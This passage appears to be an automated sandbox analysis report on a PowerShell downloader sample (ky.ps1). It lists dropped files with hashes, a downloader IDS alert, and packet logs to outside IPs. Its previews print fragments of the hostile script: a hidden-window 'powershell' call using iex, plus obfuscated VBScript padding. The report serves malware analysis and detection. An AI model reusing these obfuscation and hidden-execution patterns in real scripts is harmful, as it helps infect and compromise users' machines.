                                                                                                  Preview:......Function Seasoning(Ambrain)......Publikummetbatfowl = Mid(MidB(Command, 44, 213),21,25)....Seasoning = ChrW(Ambrain)....Opskreknivsplid = Command ......End Function ....elektroingenirerne = LenB("Sardinieren") ..elektroingenirerne = elektroingenirerne xor clng(6932161) ...... ..Sorting137 = 0.... ..Pinligstes= array(65+5+0,69,77,59,72,73,62,59,66,66)......Kopvisdislocatedavic = Log(Len("Frihedsbevgelserne"))....Private Const Kbesum = 49485..Private Const Cornbird = 16348..Private Const Nyderes = "Pandaer verificative133 knopskydning,"..Private Const Terrorize = "Postansvarlige skjorternes"..Private Const Danseorkesteret = "Myndigstes150 exculpate trykkeriers puromucous"..Private Const Unignorant = &HF76C..Private Const Iodinophilous = -9045..Private Const Polyautography = 22989..Private Const Divisibly = -6735..Private Const Takeups = &H8FE6..Private Const Inductance = &H59DF..Private Const Thorax64 = -13300..Private Const Forkiness = &H96C8..Private Const Kondensatorers147 =

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:modified
                                                                                                  Size (bytes):11608
                                                                                                  Entropy (8bit):4.890472898059848
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                                                  MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                                                  SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                                                  SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                                                  SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                                                  Malicious:false
                                                                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64
                                                                                                  Entropy (8bit):1.1940658735648508
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:NlllulN9ptZ:NllU
                                                                                                  MD5:955578BD3D8D9E7B23F38337D31327BF
                                                                                                  SHA1:97E135520056082C3789ACC013A3480B1849E468
                                                                                                  SHA-256:8B41F4FA5598DD4D2C5C6139DE00D172C356215775ABA56452F74BDE240D228A
                                                                                                  SHA-512:A9E09201AFD37ACAC8164AB876905A33441F5204E03E650A761B93D738831CA45EF2F34E775BF012E30A23B83F266DDA21BCE0E40EEB9A79E8B6458BA95A15CB
                                                                                                  Malicious:false
                                                                                                  Preview:@...e...................................~............@..........

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a3izi1ql.0qi.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_amcr0lqo.h4x.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c4e2j3yh.pjk.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e2ozzie2.yxj.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_exiuqqun.s03.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rg4amvhr.efl.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wzcsiwwl.n50.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xsnu1s14.xyy.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6224
                                                                                                  Entropy (8bit):3.732577492179261
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:mKGgQ3CgT+kvhkvCCt8FQH9PHjFQH9EHT:mKGga286N6c
                                                                                                  MD5:8FFB67D9D55453845D37675145795FA3
                                                                                                  SHA1:DB2548B036B525C0B0724C2A1A488A8EC6A583FA
                                                                                                  SHA-256:46605A4BF927E3CD4FFA1780CB09723C57601F598E81C2E24E8BCCD16C98FCBB
                                                                                                  SHA-512:C16AE2CD13D345A272ED63119CB90A221E25D93078EE022EA0BD5CC56CB12EB76695CBEAEE4E6065114FEACE25EAD72A66F468CFDBABCC0CC5B899B4D52F97C9
                                                                                                  Malicious:false
                                                                                                  Preview:...................................FL..................F.".. ...J.S.....!M.F..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S......H.F..#o+M.F......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.M...........................^.A.p.p.D.a.t.a...B.V.1......Y.M..Roaming.@......EW<2.Y.M..../......................|,.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y.M....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y.M....2......................#..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y.M....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y.M....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y.M....u...........

                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7LBIO4LKYHFZW1GLEGQN.temp

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6224
                                                                                                  Entropy (8bit):3.732577492179261
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:mKGgQ3CgT+kvhkvCCt8FQH9PHjFQH9EHT:mKGga286N6c
                                                                                                  MD5:8FFB67D9D55453845D37675145795FA3
                                                                                                  SHA1:DB2548B036B525C0B0724C2A1A488A8EC6A583FA
                                                                                                  SHA-256:46605A4BF927E3CD4FFA1780CB09723C57601F598E81C2E24E8BCCD16C98FCBB
                                                                                                  SHA-512:C16AE2CD13D345A272ED63119CB90A221E25D93078EE022EA0BD5CC56CB12EB76695CBEAEE4E6065114FEACE25EAD72A66F468CFDBABCC0CC5B899B4D52F97C9
                                                                                                  Malicious:false
                                                                                                  Preview:...................................FL..................F.".. ...J.S.....!M.F..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S......H.F..#o+M.F......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.M...........................^.A.p.p.D.a.t.a...B.V.1......Y.M..Roaming.@......EW<2.Y.M..../......................|,.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y.M....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y.M....2......................#..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y.M....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y.M....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y.M....u...........

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:ASCII text, with very long lines (825), with no line terminators
                                                                                                  Entropy (8bit):5.364613199977965
                                                                                                  TrID:
                                                                                                    File name:ky.ps1
                                                                                                    File size:825 bytes
                                                                                                    MD5:0276aaa9676e9e7293e7fbcb7dbeee12
                                                                                                    SHA1:1c0c259085b10d6f8a44be03c9c1461276413f68
                                                                                                    SHA256:987ca7478b3233506fd13038a184d7da51984f8e73e9913306b27c853245b885
                                                                                                    SHA512:daa05c489f5b6bd4ed5acaa8f78cee3e4e09202c0ff5fe2ca863c6dd95fb93813f5af11d1639b7e8780aa31c44d7ae3ea9a962c781ee09570a0563f4c4bbf64e
                                                                                                    SSDEEP:24:XWsRi8QjWIbDkLQ9FQWAa6KzsP/5JzoPU:7WKIXN9IKzsppoPU
                                                                                                    TLSH:B901CE89695651F71A50B19614C1667E3239D60660DE48B3B1BA821720AEA7D0E83B3B
                                                                                                    File Content Preview:powershell -win hidden $em02zx=iex($('[Environment]::GetEvays'''.Replace('vay','nvironmentVariable(''public'') + ''\\vh27dw.vb')));$flol=iex($('[Environment]::GetEvays'''.Replace('vay','nvironmentVariable(''public'') + ''\\f3j.vb')));function getit([strin

                                                                                                    File Icon

                                                                                                    Icon Hash:3270d6baae77db44

                                                                                                    Network Behavior

                                                                                                    Suricata IDS Alerts

                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2024-12-05T10:45:05.484643+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649747184.171.244.231443TCP

                                                                                                    Network Port Distribution

                                                                                                    TCP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Dec 5, 2024 10:44:49.438456059 CET49709443192.168.2.693.95.216.175
                                                                                                    Dec 5, 2024 10:44:49.438503981 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:49.438621998 CET49709443192.168.2.693.95.216.175
                                                                                                    Dec 5, 2024 10:44:49.449069977 CET49709443192.168.2.693.95.216.175
                                                                                                    Dec 5, 2024 10:44:49.449101925 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:50.885462046 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:50.885585070 CET49709443192.168.2.693.95.216.175
                                                                                                    Dec 5, 2024 10:44:51.052356958 CET49709443192.168.2.693.95.216.175
                                                                                                    Dec 5, 2024 10:44:51.052378893 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:51.052721024 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:51.103467941 CET49709443192.168.2.693.95.216.175
                                                                                                    Dec 5, 2024 10:44:51.115900040 CET49709443192.168.2.693.95.216.175
                                                                                                    Dec 5, 2024 10:44:51.159322977 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:51.729578972 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:51.729608059 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:51.729614973 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:51.729774952 CET49709443192.168.2.693.95.216.175
                                                                                                    Dec 5, 2024 10:44:51.729799032 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:51.775429010 CET49709443192.168.2.693.95.216.175
                                                                                                    Dec 5, 2024 10:44:51.832389116 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:51.832401037 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:51.832444906 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:51.832597971 CET49709443192.168.2.693.95.216.175
                                                                                                    Dec 5, 2024 10:44:51.832638025 CET49709443192.168.2.693.95.216.175
                                                                                                    Dec 5, 2024 10:44:51.929074049 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:51.929085016 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:51.929182053 CET49709443192.168.2.693.95.216.175
                                                                                                    Dec 5, 2024 10:44:51.929208994 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:51.954238892 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:51.954299927 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:51.954314947 CET49709443192.168.2.693.95.216.175
                                                                                                    Dec 5, 2024 10:44:51.954340935 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:51.954368114 CET49709443192.168.2.693.95.216.175
                                                                                                    Dec 5, 2024 10:44:51.987687111 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:51.987696886 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:51.987765074 CET49709443192.168.2.693.95.216.175
                                                                                                    Dec 5, 2024 10:44:51.987785101 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:52.028755903 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:52.028764963 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:52.028779030 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:52.028846979 CET49709443192.168.2.693.95.216.175
                                                                                                    Dec 5, 2024 10:44:52.028868914 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:52.072292089 CET49709443192.168.2.693.95.216.175
                                                                                                    Dec 5, 2024 10:44:52.113461971 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:52.113473892 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:52.113500118 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:52.113682985 CET49709443192.168.2.693.95.216.175
                                                                                                    Dec 5, 2024 10:44:52.128776073 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:52.128786087 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:52.128813028 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:52.128928900 CET49709443192.168.2.693.95.216.175
                                                                                                    Dec 5, 2024 10:44:52.128947020 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:52.143280029 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:52.143289089 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:52.143317938 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:52.143410921 CET49709443192.168.2.693.95.216.175
                                                                                                    Dec 5, 2024 10:44:52.143426895 CET4434970993.95.216.175192.168.2.6
                                                                                                    Dec 5, 2024 10:44:52.148813009 CET49709443192.168.2.693.95.216.175
                                                                                                    Dec 5, 2024 10:44:52.610914946 CET49715443192.168.2.691.193.42.13
                                                                                                    Dec 5, 2024 10:44:52.610970020 CET4434971591.193.42.13192.168.2.6
                                                                                                    Dec 5, 2024 10:44:52.611048937 CET49715443192.168.2.691.193.42.13
                                                                                                    Dec 5, 2024 10:44:52.611447096 CET49715443192.168.2.691.193.42.13
                                                                                                    Dec 5, 2024 10:44:52.611459017 CET4434971591.193.42.13192.168.2.6
                                                                                                    Dec 5, 2024 10:44:54.067238092 CET4434971591.193.42.13192.168.2.6
                                                                                                    Dec 5, 2024 10:44:54.067328930 CET49715443192.168.2.691.193.42.13
                                                                                                    Dec 5, 2024 10:44:54.069526911 CET49715443192.168.2.691.193.42.13
                                                                                                    Dec 5, 2024 10:44:54.069542885 CET4434971591.193.42.13192.168.2.6
                                                                                                    Dec 5, 2024 10:44:54.069801092 CET4434971591.193.42.13192.168.2.6
                                                                                                    Dec 5, 2024 10:44:54.071139097 CET49715443192.168.2.691.193.42.13
                                                                                                    Dec 5, 2024 10:44:54.111352921 CET4434971591.193.42.13192.168.2.6
                                                                                                    Dec 5, 2024 10:44:54.519155979 CET4434971591.193.42.13192.168.2.6
                                                                                                    Dec 5, 2024 10:44:54.572237968 CET49715443192.168.2.691.193.42.13
                                                                                                    Dec 5, 2024 10:44:54.572293997 CET4434971591.193.42.13192.168.2.6
                                                                                                    Dec 5, 2024 10:44:54.619082928 CET49715443192.168.2.691.193.42.13
                                                                                                    Dec 5, 2024 10:44:54.654408932 CET4434971591.193.42.13192.168.2.6
                                                                                                    Dec 5, 2024 10:44:54.654419899 CET4434971591.193.42.13192.168.2.6
                                                                                                    Dec 5, 2024 10:44:54.654462099 CET4434971591.193.42.13192.168.2.6
                                                                                                    Dec 5, 2024 10:44:54.654485941 CET4434971591.193.42.13192.168.2.6
                                                                                                    Dec 5, 2024 10:44:54.654491901 CET49715443192.168.2.691.193.42.13
                                                                                                    Dec 5, 2024 10:44:54.654498100 CET4434971591.193.42.13192.168.2.6
                                                                                                    Dec 5, 2024 10:44:54.654524088 CET4434971591.193.42.13192.168.2.6
                                                                                                    Dec 5, 2024 10:44:54.654544115 CET49715443192.168.2.691.193.42.13
                                                                                                    Dec 5, 2024 10:44:54.654544115 CET49715443192.168.2.691.193.42.13
                                                                                                    Dec 5, 2024 10:44:54.697242022 CET49715443192.168.2.691.193.42.13
                                                                                                    Dec 5, 2024 10:44:54.894139051 CET4434971591.193.42.13192.168.2.6
                                                                                                    Dec 5, 2024 10:44:54.894151926 CET4434971591.193.42.13192.168.2.6
                                                                                                    Dec 5, 2024 10:44:54.894211054 CET4434971591.193.42.13192.168.2.6
                                                                                                    Dec 5, 2024 10:44:54.894243002 CET4434971591.193.42.13192.168.2.6
                                                                                                    Dec 5, 2024 10:44:54.894309998 CET49715443192.168.2.691.193.42.13
                                                                                                    Dec 5, 2024 10:44:54.894408941 CET49715443192.168.2.691.193.42.13
                                                                                                    Dec 5, 2024 10:44:54.895832062 CET49715443192.168.2.691.193.42.13
                                                                                                    Dec 5, 2024 10:44:57.290779114 CET49728443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:44:57.290843010 CET44349728184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:44:57.290926933 CET49728443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:44:57.294228077 CET49728443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:44:57.294239044 CET44349728184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:44:58.753516912 CET44349728184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:44:58.753638029 CET49728443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:44:58.756086111 CET49728443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:44:58.756113052 CET44349728184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:44:58.756432056 CET44349728184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:44:58.763252020 CET49728443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:44:58.807341099 CET44349728184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:44:59.209999084 CET44349728184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:44:59.210081100 CET44349728184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:44:59.210289001 CET49728443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:44:59.212760925 CET49728443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:03.762511015 CET49747443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:03.762569904 CET44349747184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:03.762654066 CET49747443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:03.762938976 CET49747443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:03.762953997 CET44349747184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:05.023936987 CET44349747184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:05.032255888 CET49747443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:05.032268047 CET44349747184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:05.484663963 CET44349747184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:05.484735966 CET44349747184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:05.484862089 CET49747443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:05.485991955 CET49747443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:09.629322052 CET49763443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:09.629395008 CET44349763148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:09.629487038 CET49763443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:09.629765987 CET49763443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:09.629777908 CET44349763148.251.114.233192.168.2.6
